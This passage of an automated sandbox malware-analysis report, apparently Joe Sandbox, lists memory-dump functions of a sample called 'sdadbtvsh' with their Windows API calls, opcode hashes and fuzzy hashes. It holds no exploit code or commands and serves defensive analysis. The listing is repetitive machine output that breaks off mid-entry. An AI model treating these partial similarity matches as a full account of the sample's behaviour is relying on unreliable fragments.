                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DestroyWindow
                                                                                              • String ID: msctls_updown32
                                                                                              • API String ID: 4014797782-2298589950
                                                                                              • Opcode ID: 08aa71e514924658fe75337ac4f574aa9a25ff7a0fd0620260d9837f61301748
                                                                                              • Instruction ID: 5ad2d835b4bb61516eea1245fa244a563112fd06b169290270f8ce0c27ab6b98
                                                                                              • Opcode Fuzzy Hash: 08aa71e514924658fe75337ac4f574aa9a25ff7a0fd0620260d9837f61301748
                                                                                              • Instruction Fuzzy Hash: C52192B5600A19AFDB21DF14DC85DBB37AEEF9A3A4B000559F9019B361CB71EC518F60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0062419F
                                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 006241AF
                                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 006241D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$MoveWindow
                                                                                              • String ID: Listbox
                                                                                              • API String ID: 3315199576-2633736733
                                                                                              • Opcode ID: 02d2e66c9829cdfaaab5892a5b14978643b2c2ea9fe03fdc725bfa05ab9c52cd
                                                                                              • Instruction ID: 09c69e066344d12bb5693ca09da8d021db34fd4d6c950ae87b055f141dc000c6
                                                                                              • Opcode Fuzzy Hash: 02d2e66c9829cdfaaab5892a5b14978643b2c2ea9fe03fdc725bfa05ab9c52cd
                                                                                              • Instruction Fuzzy Hash: 0A21AA32610528BFDF118F54DC49EFB376FEF99794F118114F9149B290CA719CA28B90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00624BAE
                                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00624BC3
                                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00624BD0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: msctls_trackbar32
                                                                                              • API String ID: 3850602802-1010561917
                                                                                              • Opcode ID: ac5903c0c06ca04ec82536336ffc6f55d84b766dc8b844682cb8588ff8aa185c
                                                                                              • Instruction ID: fcb087eda5ea1ea2bc942fcc8ff7ce1100334eb4591df49998dc0bd556ea124d
                                                                                              • Opcode Fuzzy Hash: ac5903c0c06ca04ec82536336ffc6f55d84b766dc8b844682cb8588ff8aa185c
                                                                                              • Instruction Fuzzy Hash: 6E113631240208BEEF205F64DC46FEB3BAAEF85B55F010518FA51E31A0DA71DC218B20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00626220
                                                                                              • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 0062624D
                                                                                              • DrawMenuBar.USER32(?), ref: 0062625C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$InfoItem$Draw
                                                                                              • String ID: 0
                                                                                              • API String ID: 3227129158-4108050209
                                                                                              • Opcode ID: cd2be28cdbdfd2dfeda0ae96a55a4af39015f477326ae9cd660c51f87ce1b2ea
                                                                                              • Instruction ID: 2c9a890f4b89422b58150acff833dbd1c4ea076487eb23013a8e070f69f27ac9
                                                                                              • Opcode Fuzzy Hash: cd2be28cdbdfd2dfeda0ae96a55a4af39015f477326ae9cd660c51f87ce1b2ea
                                                                                              • Instruction Fuzzy Hash: BE01C031501629EFDB209F54EC88BEA7FB6FF44310F148095F849E6150CB708A81EF21
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5c86c011ba851cb6ddf0614e2565f24c58fad1df80e8daadb3a7bad081ece46d
                                                                                              • Instruction ID: 90ab4b72333d47a3790770f7f92785b822a3021cc2aabd6f6eb779d8ef751007
                                                                                              • Opcode Fuzzy Hash: 5c86c011ba851cb6ddf0614e2565f24c58fad1df80e8daadb3a7bad081ece46d
                                                                                              • Instruction Fuzzy Hash: CAC17D75A0021AEFDB14CF94C894ABEBBB5FF88304F149598E605DB292D735ED41CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm$_strrchr
                                                                                              • String ID:
                                                                                              • API String ID: 1036877536-0
                                                                                              • Opcode ID: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                              • Instruction ID: 9b37de4ab070e13d9f111b3658ddaea8890b6a3ba3ef3f26228ff4b24cb5dc17
                                                                                              • Opcode Fuzzy Hash: 173a905e0583d248f4586312a6838000a577cfe73f6efb9ac5c35750ff0a0cfb
                                                                                              • Instruction Fuzzy Hash: 2BA127759003869FEB25CF98C8A1FAEBFA5FF55310F28456EE9859B241C3349941CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00630BD4,?), ref: 005F0E80
                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00630BD4,?), ref: 005F0E98
                                                                                              • CLSIDFromProgID.OLE32(?,?,00000000,0062DCE0,000000FF,?,00000000,00000800,00000000,?,00630BD4,?), ref: 005F0EBD
                                                                                              • _memcmp.LIBVCRUNTIME ref: 005F0EDE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromProg$FreeTask_memcmp
                                                                                              • String ID:
                                                                                              • API String ID: 314563124-0
                                                                                              • Opcode ID: 033f1ff23e6191e0783bdb59fd64fc32fe506743564ef70e1a5840f60fb87a06
                                                                                              • Instruction ID: c4c5217aa6dd5d85baa90647809c68ce470cc542bbf6126d44b7834b46709397
                                                                                              • Opcode Fuzzy Hash: 033f1ff23e6191e0783bdb59fd64fc32fe506743564ef70e1a5840f60fb87a06
                                                                                              • Instruction Fuzzy Hash: 7D813C75A00109EFCF00DF94C984EEEBBB9FF89315F244558E606AB251DB75AE06CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateToolhelp32Snapshot.KERNEL32 ref: 0061B00B
                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 0061B019
                                                                                                • Part of subcall function 0059B25F: _wcslen.LIBCMT ref: 0059B269
                                                                                              • Process32NextW.KERNEL32(00000000,?), ref: 0061B0FB
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0061B10A
                                                                                                • Part of subcall function 005AE2E5: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,005D4D4D,?), ref: 005AE30F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 1991900642-0
                                                                                              • Opcode ID: e52ffcd76d8f1bbeb3ae3589f5b2336bc29e27ad47c3ec367b1f24738afe5f98
                                                                                              • Instruction ID: 6dc956b691e25bb97e241c1ce950ae3c99e590256ab1eb410bf4e0f28a0ba7eb
                                                                                              • Opcode Fuzzy Hash: e52ffcd76d8f1bbeb3ae3589f5b2336bc29e27ad47c3ec367b1f24738afe5f98
                                                                                              • Instruction Fuzzy Hash: 0F516971508301AFD710EF24D88AAABBBE9FFC9754F04491DF98597261EB70D904CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • socket.WSOCK32(00000002,00000002,00000011), ref: 0061245A
                                                                                              • WSAGetLastError.WSOCK32 ref: 00612468
                                                                                              • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 006124E7
                                                                                              • WSAGetLastError.WSOCK32 ref: 006124F1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$socket
                                                                                              • String ID:
                                                                                              • API String ID: 1881357543-0
                                                                                              • Opcode ID: 21aa44e8d4600999bfc5b0b0563fb5e5bdc4d8c68ec45e7bf2de1b7ff902ded1
                                                                                              • Instruction ID: 0014e9cc5f5c1621efbb09b90d4d40b6a0a62c8760e1a9d5b0523e3fda31f032
                                                                                              • Opcode Fuzzy Hash: 21aa44e8d4600999bfc5b0b0563fb5e5bdc4d8c68ec45e7bf2de1b7ff902ded1
                                                                                              • Instruction Fuzzy Hash: 4941D574640602AFEB209F24C8AAF693BE6AB45714F58C448F5199F3D2C671ED82CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00626C41
                                                                                              • ScreenToClient.USER32(?,?), ref: 00626C74
                                                                                              • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00626CE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: 8d34d7c6337b2adeb763f4dddb40d1c00fd960667f4cbb75b9d54f6db641c918
                                                                                              • Instruction ID: 83e755861f9bd09fe4631b52b29f3f4094c6949304dfaabf02bc880effff718f
                                                                                              • Opcode Fuzzy Hash: 8d34d7c6337b2adeb763f4dddb40d1c00fd960667f4cbb75b9d54f6db641c918
                                                                                              • Instruction Fuzzy Hash: 29512C74A00A19AFCF14DF54D9809AE7BB6FF45360F108559F8559B290D770AD81CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006060DD
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 00606103
                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00606128
                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00606154
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: f024c21ca419a8f5b9bec445d3fd213273228379b283bfe96c148450c50863db
                                                                                              • Instruction ID: 36efee09ebe78c9bed5601ef821ecbb8deefe9e131ac0236b9e5803dc6b85ab2
                                                                                              • Opcode Fuzzy Hash: f024c21ca419a8f5b9bec445d3fd213273228379b283bfe96c148450c50863db
                                                                                              • Instruction Fuzzy Hash: 03413C35200A11DFCF14EF14C559A5EBBE6FF89310B198088E84A9B3A2CB30FD01CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32 ref: 0062204A
                                                                                                • Part of subcall function 005F42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F42E6
                                                                                                • Part of subcall function 005F42CC: GetCurrentThreadId.KERNEL32 ref: 005F42ED
                                                                                                • Part of subcall function 005F42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F2E43), ref: 005F42F4
                                                                                              • GetCaretPos.USER32(?), ref: 0062205E
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 006220AB
                                                                                              • GetForegroundWindow.USER32 ref: 006220B1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: 2942ca8912bbcf359a04adabc6ca65c408988efb9caf2e14859d5bf0b6015f97
                                                                                              • Instruction ID: a81a0adfe83cb94180099cb1b8c7a83eb9bd168b680317602078fc8912335940
                                                                                              • Opcode Fuzzy Hash: 2942ca8912bbcf359a04adabc6ca65c408988efb9caf2e14859d5bf0b6015f97
                                                                                              • Instruction Fuzzy Hash: 79313371D0010AAFCB14EFA5D8858EEBBF9FF89314B50846AE515E7211DA71DE05CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00594154: _wcslen.LIBCMT ref: 00594159
                                                                                              • _wcslen.LIBCMT ref: 005FE7F7
                                                                                              • _wcslen.LIBCMT ref: 005FE80E
                                                                                              • _wcslen.LIBCMT ref: 005FE839
                                                                                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 005FE844
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ExtentPoint32Text
                                                                                              • String ID:
                                                                                              • API String ID: 3763101759-0
                                                                                              • Opcode ID: e0bd10c0f35e12dac058beb5333f051050c4d555cdcd396817e3376e8dc5a3b7
                                                                                              • Instruction ID: 1bc4f33190aca778bf072de3326c9200da2c121843b48a4c9fad571b34f2b365
                                                                                              • Opcode Fuzzy Hash: e0bd10c0f35e12dac058beb5333f051050c4d555cdcd396817e3376e8dc5a3b7
                                                                                              • Instruction Fuzzy Hash: D621D671D00215AFDB11AFA8C986BFEBFB8FF85750F104064E904AB291D6749E41CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00623169
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00623183
                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00623191
                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 0062319F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                              • String ID:
                                                                                              • API String ID: 2169480361-0
                                                                                              • Opcode ID: e41642483e7fbfc5764e136be69547955b6863f8cdcf1027055f9a83f2b93286
                                                                                              • Instruction ID: 9ef8cb394449e9e9465630e74c6f73bd0051113ea8b15eb8a5d064aeeb500a8a
                                                                                              • Opcode Fuzzy Hash: e41642483e7fbfc5764e136be69547955b6863f8cdcf1027055f9a83f2b93286
                                                                                              • Instruction Fuzzy Hash: 2B217131204931AFE7159B14DC49FAA7BA6AF85324F248158F4668B3D2CB79ED42CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 005F960C: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,005F8199,?,000000FF,?,005F8FE3,00000000,?,0000001C,?,?), ref: 005F961B
                                                                                                • Part of subcall function 005F960C: lstrcpyW.KERNEL32(00000000,?), ref: 005F9641
                                                                                                • Part of subcall function 005F960C: lstrcmpiW.KERNEL32(00000000,?,005F8199,?,000000FF,?,005F8FE3,00000000,?,0000001C,?,?), ref: 005F9672
                                                                                              • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,005F8FE3,00000000,?,0000001C,?,?,00000000), ref: 005F81B2
                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 005F81D8
                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,005F8FE3,00000000,?,0000001C,?,?,00000000), ref: 005F8213
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                                              • String ID: cdecl
                                                                                              • API String ID: 4031866154-3896280584
                                                                                              • Opcode ID: 90e28e91035b198625c0c95f593bf81a5ef1364adb2feb457662128489b06d78
                                                                                              • Instruction ID: 586d59fdc9be884f1013c6a73988163d1b16bca3a38b63b96378fcdb396eb1dc
                                                                                              • Opcode Fuzzy Hash: 90e28e91035b198625c0c95f593bf81a5ef1364adb2feb457662128489b06d78
                                                                                              • Instruction Fuzzy Hash: 3E110B3E200706ABCB145F38DC49E7A7BE5FF95350B50502AFA46C72A0EF35A812C790
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0062866A
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00628689
                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 006286A1
                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0060C10A,00000000), ref: 006286CA
                                                                                                • Part of subcall function 00592441: GetWindowLongW.USER32(00000000,000000EB), ref: 00592452
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.1600497896.0000000000591000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00590000, based on PE: true
                                                                                              • Associated: 00000008.00000002.1600477053.0000000000590000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.000000000062D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600640041.0000000000653000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1600702337.000000000065D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                              • Associated: 00000008.00000002.1601039501.0000000000665000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_590000_sdadbtvsh.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Long
                                                                                              • String ID:
                                                                                              • API String ID: 847901565-0
                                                                                              • Opcode ID: 8c697c77a61aa7b519ec0c038cac6a93031519e1b4eab455447ae4c2af7d0bf1
